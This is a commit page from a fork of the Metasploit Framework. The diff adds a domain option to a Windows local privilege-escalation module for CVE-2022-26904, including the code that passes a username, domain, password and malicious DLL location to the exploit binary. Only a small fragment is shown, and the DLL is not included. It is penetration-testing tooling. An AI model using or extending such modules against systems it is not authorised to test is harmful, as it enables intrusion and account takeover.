dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Add in support for exploiting domain joined systems

This commit is contained in:
Grant Willcox 2022-03-28 16:14:19 -05:00
parent b408197cb7
commit bd3e0c1b53
No known key found for this signature in database
GPG Key ID: D35E05C0F2B81E83
2 changed files with 2 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
data/exploits/CVE-2022-26904/CVE-2022-26904.dll
View File

Binary file not shown.

3
modules/exploits/windows/local/cve_2022_26904_superprofile.rb
View File

@ -75,6 +75,7 @@ class MetasploitModule < Msf::Exploit::Local
register_options([
OptString.new('LOGINUSER', [true, 'Username of the secondary normal privileged user to log in as. Cannot be the same as the current user!']),
OptString.new('LOGINDOMAIN', [true, 'Domain that the LOGINUSER belongs to. Ensures we log into the right domain.', '.']),
OptString.new('LOGINPASSWORD', [true, 'Password for the secondary normal privileged user to log in as'])
])
end
@ -227,7 +228,7 @@ class MetasploitModule < Msf::Exploit::Local
library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-26904', 'CVE-2022-26904.dll')
library_path = ::File.expand_path(library_path)
dll_info_parameter = datastore['LOGINUSER'].to_s + '||' + datastore['LOGINPASSWORD'].to_s + '||' + malicious_dll_location.to_s
dll_info_parameter = datastore['LOGINUSER'].to_s + '||' + datastore['LOGINDOMAIN'].to_s + '||' + datastore['LOGINPASSWORD'].to_s + '||' + malicious_dll_location.to_s
# invoke the exploit, passing in the address of the payload that
# we want invoked on successful exploitation, and the credentials for the second user.